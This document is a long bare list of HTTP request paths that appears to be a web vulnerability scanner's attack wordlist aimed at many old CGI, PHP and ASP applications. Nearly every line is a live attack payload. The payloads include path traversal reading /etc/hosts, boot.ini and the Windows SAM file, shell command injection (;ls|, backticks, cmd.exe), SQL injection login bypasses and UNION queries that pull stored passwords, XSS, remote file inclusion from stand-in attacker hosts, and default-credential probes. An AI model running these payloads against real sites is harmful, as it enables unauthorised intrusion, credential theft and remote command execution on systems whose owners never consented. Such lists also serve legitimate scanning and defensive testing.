/cgi-bin/postie.exe
/cgi-bin/postie.cgi
/scripts/postie.exe
/scripts/postie.cgi
/cgi-bin/formvar.exe
/scripts/formvar.exe
/cgi-bin/blat.exe
/scripts/blat.exe
/cgi-bin/cgimail.exe
/scripts/cgimail.exe
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
:4096/../../../winnt/repair/sam._
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
/ext.dll%00
/cgiWebupdate.exe
/index.php?file=http://xxx&fcmd=ls
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/basilix/basilix.php3?username=blah;ls
/basilix/basilix.php?username=blah;ls
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/a%5c.aspx
/web.config
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/shop.pl?page=xxx
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
/images/tmp.txt
/cgi-bin/html_page?TEMPLATE=main
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/cgi-bin/console.exe?page_size=
/cgi-bin/cs.exe?action=
/cgi-bin/forma
/run/forma
/cgi-bin/w3mail/login.cgi
/servlet/psoft.hsphere.CP
/tst/psoft.hsphere.CP/tst/?template_name=x
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/run.cgi
/cgi-bin/ibillpm.pl
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/cgi-bin/lb5000/search.cgi
/join.cfm
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/modules.php?name=Downloads&d_op=viewdownload&cid=59%20or%20cid=2
/modules.php?name=Members_List&letter=’%20OR%20user_level=’4’/*
/modules/WebMail/mailattach.php
/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1’sql
/modules.php?op=modload&name=Forums&file=viewforum&forum=’%20OR%201=1;--
/modules.php?op=modload&name=Forums&file=reply&forum=1’);--
/modules.php?op=modload&name=Forums&file=newtopic&forum=1’);--
/modules.php?op=modload&name=Forums&file=editpost&forum=1’;--
/modules.php?op=modload&name=Forums&file=attachment&AtchOp=show
/modules.php?name=AvantGo&file=print&sid=textgoesherexxx
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%23sql_injection
/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201*1*aid*1*pwd*1*1*1*1* 1*1*1*1*1*1%20FROM%20nuke_authors%20WHERE%20radmin super=1
/module.php?link=http://anotherhost_file_extension
/global.cnf
/asearch.cnf
/hypermail
/ifx/?LO=../../../../../../../../../etc/hosts
/stronghold-info
/stronghold-status
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-sys/PGPMail.pl
/cgi-bin/PGPMail.pl
/Test11.asp
/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/UploadScript11.asp
/components/AspUpload/Samples/DirectoryListing.asp
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:10000/net/
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
/cgi-bin/paramtool
/cgi-bin/hwtestio
/a/
/cgi-bin/csvform.pl?file=/bin/ls%00|
/manual.php
/servlet/ServletManager?username=servlet&password=manager
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/phprocketaddin/?page=../../../../../../../etc/hosts
/cgi-bin/lastlines.cgi
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/modules.php?name=Members_List&&sql_debug=1
/modules.php?name=Your_Account&op=userinfo&uname=
/Secure/Local/console/cmhome.htm
/cgi-bin/boozt/admin/index.cgi
/applist.asp
/oetaki/oetaki.cgi
/oetaki/oekakibbs.conf
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/data/default_pref
/data/administrator.pref
/data/admin.pref
/data/root.pref
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/hostingcontroller
/advwebadmin
/cgi-bin/store/agora.cgi?page=hoschi.html
/userinfo.php?uid=33;
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/forum/forumdisplay.php?s=&forumid=
/forums/forumdisplay.php?s=&forumid=
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/fom/fom.cgi?cmd=**********alert(x)</script>&file=1&keywords=x
/scripts/texis.exe/ngohos
/cgi-bin/texis.exe/ngohos
/cgi-bin/texis/hoschiboschi
/globals.jsa
/_pages/
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/cgi-bin/auction/auction.pl?action=tst
/cgi-bin/auctiondeluxe/auction.pl?action=tst
/netget?sid=user&msg=300&file=/../../../filename.ext
/ezboard/ezboard.cgi
/ez2000/ezboard.cgi
/ezboard/ezman.cgi
/ez2000/ezman.cgi
/ezboard/ezadmin.cgi
/ez2000/ezadmin.cgi
/scripts/CWMail.exe
/cgi-bin/CWMail.exe
/sips/htdocs/preferences.php
/sips/htdocs/admin/index.php
/user_update.php
/add_user.php
/scripts/gnujsp//
/servlets/gnujsp//
/scripts/webnews.exe
/cgi-bin/webnews.cgi
/cgi-bin/ans.pl?p=../../../../bin/ls|&blah
/ans.pl?p=../../../../bin/ls|&blah
/pforum/edituser.php
:8000/servlet/com.endymion.sake.servlet.mail.MailServlet?
/servlet/com.endymion.sake.servlet.mail.MailServlet?
/mail?
/cgi-bin/gm.cgi
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/.cobalt/sysManage/../admin/.htaccess
:81/.cobalt/sysManage/../admin/.htaccess
/scripts/webplus.exe
/cgi-bin/webplus.exe
/unix/ALEX/Xerver2.10/
/directory.php?dir=%3Bmore%20/etc/passwd
:8383/cd-cgi/sscd_suncourier.pl
/netutils/nettools.php
/nettools.php
/News/article.php
/File_editor.asp
/Folderactions.asp
/cgi-bin/traceroute.pl
/forum/memberlist.php
/cgi-bin/dcshop.cgi
/scrivi.php
/portal/administration/userman.php
/csSearch.cgi?command=savesetup&setup=`/bin/ls`
/scripts/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/op/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/cgi-script/CSSearch/CSSearch.cgi
/cgi-bin/CSSearch/CSSearch.cgi
/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
/cgi-bin/wwwi32.exe/[in=c:\\boot.ini]
/scripts/wwwi32.exe/[in=c:\\boot.ini]
/user.php?caselist[mungo.txt][path]=http://www.somehost.cc&command=/bin/ls
/src/options.php
/src/left_main.php
/cgi-win/testcgi.exe?tata=xxxxxuseolstr
/cgi-bin/testcgi.exe?xssstringo
/cgi-win/Pbcgi.exe?tata=xxxxuseolstr
/mail/admin
/emumail.cgi?type=fh%00
:2002/..\..\..\..\..\..\temp\temp.class
/cgi-bin/%2e%2e/abyss.conf
/site/page.html
/site/’+UNION+ALL+SELECT+FileToClob(’/etc/hosts’*’server’)::html*0+FROM+sysusers+WHERE+usern ame+=+USER+--/.html
/sws/admin.html
/cgi-bin/sws/manager.pl?
/wbboard/reply.php
/dm/demarc
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/cgi-bin/FileSeek.cgi?head=&foot=;id|
/cgi-bin/FileSeek2.cgi
/cgi-bin/environ.pl+%00
:1099/reports/superlongstringxxxaso
/BOADMIN/BACKOFFICE/SERVICES.ASP
/pvote/ch_info.php
/nul..dbm
/approval/ts_app.htm?TSN=123456
/reports/temp/
/members.asp?mode=search&M_NAME=A&initial=1&method=
:8080/examples/servlet/SnoopServlet
:8080/examples/servlet/TroubleShooter
/cgi-script/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-bin/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-bin/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/phpprojekt/
/dnstools.php?section=hosts&user_logged_in=true
/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES
/dostuff.php?action=modify_user
:1500/CONF&LOG=/etc/hosts&NOIH=no&FRAMES=y
/cgi-bin/man.cgi/usr/include;IFS=G;lsG-alsi;|
/cgi-bin/search.cgi?q=query
/cgi-bin/netpad.cgi?proc=open&of=
/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa
/servlet/com.newatlanta.servletexec.JSPServlet/
/phorum/admin/actions/del.php?include_path=http://phonehomedotcom&cmd=ls
/phorum5012/follow.php?forum_id=1&*f00=bar*1=-99_union_stuff
/admin/browse.asp?FilePath=c:\&Opt=2&level=0
/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\target\target.c om\db\..\..\..\..\
/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\
/forum/action.php?action=activation&userid=346&code=356268007
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/servlets/org.apache.cocoon.Cocoon
/cocoon/samples/welcome
/cocoon/view-source
/cocoon/status
/cocoon/
:3128/status.htm
:3128/mailbox.htm
/dbaccess.txt :
/include/oci8.php?inc_dir=http://www.atker.com&ext=txt
/include/postgres65.php?inc_dir=http://www.atker.com&ext=txt
/include/mysql.php?inc_dir=http://www.atker.com&ext=txt
/include/mssql7.php?inc_dir=http://www.atker.com&ext=txt
/include/msql.php?inc_dir=http://www.atker.com&ext=txt
/supporter/index.php?t=detailticket&id=root%20me
/supporter/index.php?t=editticket&id=got%20root
/supporter/index.php?t=updateticketlog&id=without%20me
/comment.php?mode=display&sid=foo&pid=;--injecthere&title=hoschi
/cgi-bin/admin/admin.cgi?Admin=ImageFolio
/cgi-bin/admin/setup.cgi
/setup.cgi?todo=debug
/ticket.php?id=545
/cgi-bin/CSNews.cgi
/CSNews.cgi
/cgi-bin/makebook.cgi
/cgi-bin/rwcgi60.exe?test&report=
/cgi-bin/rwcgi60.sh?test&report=
/cgi-bin/rwcgi60.cgi?test&report=
/cgi-bin/rwcgi60?test&report=
/dev60cgi/rwcgi60.exe?test&report=
/dev60cgi/rwcgi60.sh?test&report=
/dev60cgi/rwcgi60.cgi?test&report=
/dev60cgi/rwcgi60?test&report=
/demos?sql=select+*+from+Customers+as+Customer+FOR+ XML+auto&root=root&xsl=custtable.xsl&contenttype=text/html
/Nwind/Template/catalog.xml?contenttype=text/overvlowhere
/_head.php?_zb_path=http://thehost.net/a"
/board/_head.php?_zb_path=http://thehost.net/a"
/zboard/_head.php?_zb_path=http://thehost.net/a"
/zeroboard/_head.php?_zb_path=http://thehost.net/a"
/examples/jsp/view_source.jsp
/examples/jsp/source.jsp
/jsp/view_source.jsp
/view_source.jsp
/globals.php3?LangCookie=minetataa
/catalog/inludes/include_once.php?include_file=tataa
/install.php?phpbb_root_dir=myservertataa
/webMathematica/MSP?MSPStoreID=../../../../../etc/hosts&MSPStoreType=image/gif
/****cart/database/****cart.mdb
/database/****cart.mdb
/forum/admin/wwforum.mdb
/cgi-bin/webbbs/webbbs_config.pl?followup=|id|&name=100&[email protected]&subject=dd&bOdy=dlaö
/_login.jsp?login=’-- and pass=’--%00
/basilix.php
/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom& page=./../../../../../etc/hosts
/cgi-bin/update.dpgs
/update.dpgs
:8080/examples/basic/servlet/HelloServlet
:8080/examples/jsp/source.jsp
/cgi-bin/whois/whois.cgi
/cgi-bin/urlcount.cgi
/asgard/
/cgi-bin/faqmanager.cgi
/E-Guest_sign.pl
/cgi-bin/betsie/parserl.pl
/proplus/admin/login.php?action=insert&username=test&password=test
/horde/imp/login.php?1=1&imapuser=xss_script
/horde/turba/status.php
/horde/imp/mailbox.php?mailbox=/etc/hosts
/docmgmtout.php
/uploads/
/postbug.php
/anthill/postbug.php
/search?NS-query=tst&NS-query-pat=..\..\..\..\..\boot.ini
/scripts/Carello/Carello.dll
/content/base/build/explorer/none.php?/etc/
/cgi-bin/pbcgi.cgi?name=tistname&email=
/pbcgi.cgi?name=tistname&email=
/main/cafenews.php
/ext.dll
/ext.ini.%00.txt
/accounts/getuserdesc.asp
/accounts/updateuserdesc.asp
/function_foot_1.inc.php
/cgi-bin/webmail/login/xxxyyyzzz.authdaemon
:6422/iiwiznew.asp
:6422/iiaction.asp
/cgi-bin/rwcgi60/
/cgi-bin/rwcgi60/showenv
/hd/winnt/system32/cmd.exe?/c+echo+hello
:444/splashAdmin.php
/search.php?search=a’%20order%20by%20time%20desc% 3b%20qry
/search.php?search=a%’%20order%20by%20time%20de sc%3b%20qry
/MWS/HandleSearch.html?searchTarget=morethan990bytesove rflow
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAA<!--htmltags-->
/scripts/wsm.phtml?searchboxinputname=|unixcommand
:32000/mail/addressaction.html
:32000/mail/readmail.html?folder=inbox&get=1&id=something
/php-affiliate/details2.php
/details2.php
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows\sys tem.ini
/error/HTTP_NOT_FOUND.html.var
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO
/cgi-bin/%5c%2e%2e%5cbin%5cfile.exe?dir
/tmp_view.php?file=/etc/hosts
/adm/admbrowse.php?down=1&cur=%2Fetc%2F&dest=hosts&rid=1&S=123
/shop/browse.asp
/shop/details.asp
/shop/showcat.asp/
/shop/users.asp*
/shop/cart.asp
/shop/newuser.asp
/browse.asp
/details.asp
/showcat.asp/
/users.asp*
/cart.asp
/newuser.asp
/settings
/list
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/%2f%2e%2e%2fcgi-bin/
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=anoth erhostfilewithcmd
/jsptest.jsp+
/jsptest.jsp\
/filemanager/source.php?../../../../etc/hosts
/rpc.cgi
/graphs.php?action=edit&vertical_label=$(/bin/ls)
/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
/cgi-bin/db4web_c/dbdirname//etc/hosts
/modsecurity.php?inc_prefix=obox/htmlheader.php
/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
:8080/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
/modules.php?name=News&file=article&sid=1234%20or%201=1
/users.php?DATA=phpcode&then->/news.php3
/scripts/Carello/Carello.dll?CARELLOCODE=postthing&VBEXE=thisisit
/index.php?pymembs=admin
/db/users.dat
/admin/credit_card_info.php
/admin/upload.php
/showhits.php3?rel_path=http://another/main_********.inc
/checklogin.php?cfgProgDir=http://another/interface.php
/ss_admin.asp?Mode=Update&Acton=Access&UserName=pommes&Password=frittes
/vbzoom/register.php
/VBZooM/add-subject.php?Success=1&FileName=localFile&FileName_size=500&FileName_name=remoteFile
/VBZooM/download/
/web/msgError.asp?Redirect=login.htm&Reason=thingss
/web/usermgr/userlist.asp
/phpBB/phpinfo.php
/cgi-bin2/MsmMask.exe?mask=/file.ext
/phprank/update.php?page=update&name=zok&description=zok&siteurl=zok&banurl=zok&bh=42&bw=42&email=zok&spass=zok&id=1033913918
:631/jobs
:2200/perl/env.pl
:2200/lcgi/lcgitest.nlm
:2200/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2200/nsn/env.bas
:2200/nsn/fdir.bas:ShowVulume
:2200/servlet/SessionServlet
:2200/servlet/ServletManager?user=servlet&password=manager
:2200/lcgi/ndsobj.nlm/170xA=overflow
:2200/lcgi/ndsobj.nlm/OP=170xA=overflow
:2200/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2200/nsn/..%5Cutil/slist.bas
:2200/nsn/..%5Cutil/dsbrowse.bas
:2200/nsn/..%5Cutil/dir.bas
:2200/nsn/Charx230=overflow
:2211/perl/
:2211/perl/env.pl
:2211/lcgi/lcgitest.nlm
:2211/se/SYS:/novonyx/suitespot/docs/sewse/misc/allfield.jse
:2211/nsn/env.bas
:2211/nsn/fdir.bas:ShowVulume
:2211/servlet/SessionServlet
:2211/servlet/ServletManager?user=servlet&password=manager
:2211/lcgi/ndsobj.nlm/170xA=overflow
:2211/lcgi/ndsobj.nlm/OP=170xA=overflow
:2211/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/console.log
:2211/nsn/..%5Cutil/slist.bas
:2211/nsn/..%5Cutil/dsbrowse.bas
:2211/nsn/..%5Cutil/dir.bas
:2211/nsn/Charx230=overflow
:2211/perl/
:5000/diffs/foo.c@’;echo%20>tst’?nav=index.html|src/|hist/foo.c
:5555/diffs/foo.c@’;echo%20>tst’?nav=index.html|src/|hist/foo.c
:32000/mail/admin/../include.html.
:32000/mail/admin/../settings.html.
/mail/admin/../include.html.
/mail/admin/../settings.html.
/ingenium/config/config.txt
/admin/index.shtml?sel=server
/admin/index.php?cookie_adminpub_value_1
/config/config.txt
/forums/avatar.php?img=../secret/connect.php
/avatar.php?img=../secret/connect.php
/phptonuke.php?filnavn=/etc/hosts
/nuke70/modules/MS_Analysis/mstrack.php
/nuke70/modules/MS_Analysis/title.php
/nuke71/admin.php?op=NukebookEditEntry&nbid=-2%20UNION%20SELECT%20null%20/*
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
/cgi-bin/a1disp3.cgi?/../../../../../../etc/hosts
/gb/index.php?login=true
/variables.php3?Include=http://badthing-french.inc
/templates/form_header.php?noticemsg=jsinject
/cgi-bin/mojo/mojo.cgi
/phpbb/admin/admin_ug_auth.php
/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(****************);</script
/phpbb/admin/admin_words.php?mode=edit&id=1/*"><script>alert(****************);</script
/admin/admin_words.php?mode=edit&id=1/*"><script>alert(****************);</script
/board/admin/admin_ug_auth.php
/bb/admin/admin_ug_auth.php
/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=travers%00
/entete.php?subpath=http://badurl_banniere.php
/enteteacceuil.php?subpath=http://badurl_banniere.php
/topic/entete.php?subpath=http://badurl_banniere.php
/index.php?subpath=http://badurl_banniere.php
/newtopic.php?subpath=http://badurl_banniere.php
/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=http://another_/autoload.lib/&PHP_AUTO_LOAD_LIB=0
/cgi-bin/ion-p.exe?page=c:\boot.ini
/cgi-bin/ion-p?page=../../../../../etc/hosts
/networking_utils.php
/cgi-bin/cutecast/members/test.user
/ezhttpbench.php?AnalyseSite=/etc/hosts&NumLoops=1
/src/read_bOdy.php?mailbox=scripting
/artlist.php?root_path=http://another/thatfile.php
/thatfile.php?root_path=http://host/config.php_and_messages.1.php
/cgi-bin/boozt/admin/index.cgi
/soinfo.php
/admin/phpinfo.php
/agentadmin.php?agentname=’%20OR%20’’=’&agentpassword=’%20OR%20’’=’
/news/include/customize.php?l=http://host/otherfile.php
/modules/WebChat/index.php
/https-admserv/bin/perl/importInfo?dir=/tmp
/phorum/viewtopic.php?id=some_shit&t_id=2
../../myServerEXEC-0.2/readme.txt
/admin/index.php?idsession=’%20OR%20’’=’
/mambo/administrator
/newsletter.php?action=1&waroot=http://otherhost_start_php/
/sql/db_type.php?waroot=http://anotherhost_start_php/
/cgi-bin/openwebmail-abook.pl?sessionid=test-session-0
/cgi-bin/openwebmail/userstat.pl
/cgi-bin/webmail?WEBTEMPLATE=a&MAILTEMPLATE=b&[email protected]&SUBJECT=test
/cartman.php?action=add&id=1001&descr=MS%20Office%202000&price=119&quantity=1
/a_security.htm
/modif/ident.php?id=validmemberidnumeric&pass=’%20OR%20’’=’
/modeles/haut.php?dirroot=http://badhost_with_lang_lang.php&SESSION=.
/nx/common/cds/menu.inc.php?c_path=otherhost_with__common_lib_lau nch.inc.php
/cgi-bin/webshell
/admin/system_footer.php
/html/chatheader.php?mainfile=anything&Default_Theme=xss_script
/html/partner.php?mainfile=anything&Default_Theme=xss_script
/admin_t/include/aff_liste_langue.php?rep_include=myhost_with_para_ langue.php
/admin_t/include/find_theni_home.php
/s8forumfolder/users/any_name.php?cmd=uname%20-a_mail_cmd_etc
/inc/dbase.php?prefix=myhost
/inc/config.php?prefix=myhost
/inc/common.load.php?prefix=myhost
/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=another_h ost
/library/lib.php
/library/editor/editor.php?root=myhost_library__editor__PropAcce_s tring.php
/imp/mailbox.php3?actionID=6&server=x&imapuser=x’;sqlthings
/webstore/admin/addcustomer.php
/jta20.jar
/applet.conf
/default.conf
/webstore/addcustomer.php
/addcustomer.php
/cgi-bin/smartsearch/smartsearch.cgi?keywords=cmdwithpipes
/upload.php
/administrator/upload.php
/administrator/gallery/uploadimage.php
/yabbse/
/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6 d19f2;action=post;threadid=1;title=Post+reply;quot e=-12)+UNION+SELECT+passwd*null*null*null*null*null*n ull*null*null+FROM+yabbse_members+where+ID_MEMBER= 1/*
/yabb/
/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/yabb/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/cgi-bin/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/yabbse/Reminder.php?searchtype=esearch&user=userA’%20or%20memberName=’userB
/current/index.php?site=demos&bn=../../../../../../../../../../etc/hosts%00
/current/modules.php?mod=fm&file=../../../../../../../../../../etc/hosts%00&bn=fm_d1
/cgi-bin/Users/default.users
/Users/default.users
/cgi-bin/bbmat/bbmat.pwd
/bbmat/bbmat.pwd
/wx/s.dll?d=/bootlog.txt
/typo3/
/typo3/quickstart/
/quickstart/
/cms/typo3conf/ext/
/cms/typo3/
/typo3/dev/translations.php
/cms/typo3/install/
/typo3/install/
/profiles.php?uid=scriptthings
/profile.php
/cgi-bin/update_profile.cgi
/dodo/cgi-bin/update_profile.cgi
/cgi-bin/psunami.cgi?action=board&board=1&topic=shellcmd
/privmsg.php
/accesscontrol.php
/protectedpage.php?uid=’%20OR%20’’=’&pwd=’%20OR%20’’=’
/modules/WebMail/mailattach.php?userfile=../../some.php&userfile_name=../attachments/file.txt&attachments=1
/TopSitesdirectory/help.php?sid=xssthings
/topsitesdirectory/edit.php?a=pre&submit=&sid=sql_injection--
/chgpwd.php?USERNAME=existing_user&PASSWORD=’%20OR%20’’=’
/admin/index.php?USERNAME=’%20OR%20’’=’&PASSWORD=’%20OR%201=1%20AND%20level=’1
/include/default_header.php
/include/options_form.php
/adminopts/login_form.php
/adminopts/include/ban_form.php
/adminopts/include/board_form.php
/adminopts/include/login_form.php
/adminopts/include/vip_form.php
/forum/include/default_header.php?script_path=http://host_with_-include-default_style.css
/includes/add.php
/room/save_item.php?name=wollo&ref=josef&photo=../inc/conf.php&photo_type=txt
/room/index.php?show=search&search=it_name&item=wollo
/support/messages
/topsitesdir/edit.php?a=pre&submit=&auth=1&sid=someid
/bin/common/search.pl
/yabbse/Sources/Packages.php?sourcedir=anotherhost_with_Packer.php
/search/results.stm?query=<script>alert(’X’);</script>
/zorum/include.php?gorumDir=anotherhost_with_group.php
/forum/include.php?gorumDir=anotherhost_with_group.php
/include.php?path=contact.php&contact_email=">xss_things
/search/results.stm
/servlet/psft.pt8.config.ConfigServlet
/servlet/psft.pt8.reader.ReaderServlet
/servlet/psft.pt8.gateway.GatewayServlet
/phplinks/include/email_confirmation.php?UserName=x&Email=x@target&site_title=test_&email_confirmation_2=Hello&owner_name=bu&owner_email=x@own
/cgi-bin/texis/vortex.log
/cgi-bin/texis/monitor.log
/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2 fhosts
/cgi-bin/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2 fhosts
/admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp
/includes/header.php3?my_header=xyz
/includes/footer.php3?my_footer=yxz
/admin/exec.php3?cmd=syscmd
/hit.php?url_hit=anotherhost_with_config.php
/user/test.txt
/user/admin.txt
/cgi-sys/guestbook.cgi?user=cpanel&template=|pwd|
/admin/user_modif.php
/admin/admin_modif.php
/admin/admin_suppr.php
/sendphoto.php?album=..&***=config.inc.php
/sendphoto.php?album=..&***=config.inc.php&[email protected]&filled=1
/administrator/index2.php
/AdminHtml/parse_xml.cgi
/cutenews/shownews.php?cutepath=anotherhost_with_config.php_ or_news.txt
/cutenews/search.php?cutepath=anotherhost_with_config.php_or _news.txt
/cutenews/comments.php?cutepath=anotherhost_with_config.php_ or_news.txt
/plugins/3fax/1blocklists/index.php?plugin=anotherserver_with_things
/plugins/2administration/6departamentadmin/index.php
/plugins/2administration/5terminals/index.php
/plugins/2administration/4mailinglists/index.php
/plugins/2administration/3departaments/index.php
/plugins/2administration/2groupd/index.php
/include/help.php?base=anotherserver_with_include_common.in c
/in.php?id=any_word
/out.php?id=any_word
/top/in.php?id=any_word
/top/out.php?id=any_word
/topo/in.php?id=any_word
/topo/out.php?id=any_word
/mail/src/search.php
/mail/src/read_bOdy.php
/webmail/src/search.php
/webmail/src/read_bOdy.php
/src/search.php
/src/read_bOdy.php
/ipchat.php?root_path=anotherhost_with_conf_global. php
/billing/billing.swf
/billing/billing.apw
/logicworks/logicworks.ini
/logicworks.ini
/defines.php?WEBCHATPATH=anothersrvr_language_engli sh.php
/livredor/index.php?XSS
/compte.php?achat=1&valider=1&identifiant=’%20OR%20’’=’&password=’%20OR%20’’=’
/phpping/index.php?pingto=www.somewhere.org%20|%20dir
/cgi-bin/logbook/logbook.pl?file=cmdpipe
/cgi-bin/logbook.pl?file=cmdpipe
/logbook.pl?file=cmdpipe
/simplebbs/users/users.php
/fm.php
/texis.exe/?-version
/texis.exe/?-dump
/scripts/texis.exe/?-version
/scripts/texis.exe/?-dump
/cleartrust/ct_logon.asp?CTLoginErrorMsg=XSS
/k/home?dir=/&file=../../../../../../../../etc/hosts&lang=en
/sips/sipssys/users/
/sipssys/users/
/chat/!nicks.txt
/chat/admin.php3
/chat/admin.php
/chat/!pwds.txt
/checkout_payment.php?payment_error=cc&error=<script%20language=javascript>window.ale rt%28****************%29;</script>
/modules/mydownloads/viewcat.php
/modules/mylinks/brokenlink.php
/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
/viewpage.php?file=/etc/hosts
/myguestBk/admin/index.asp
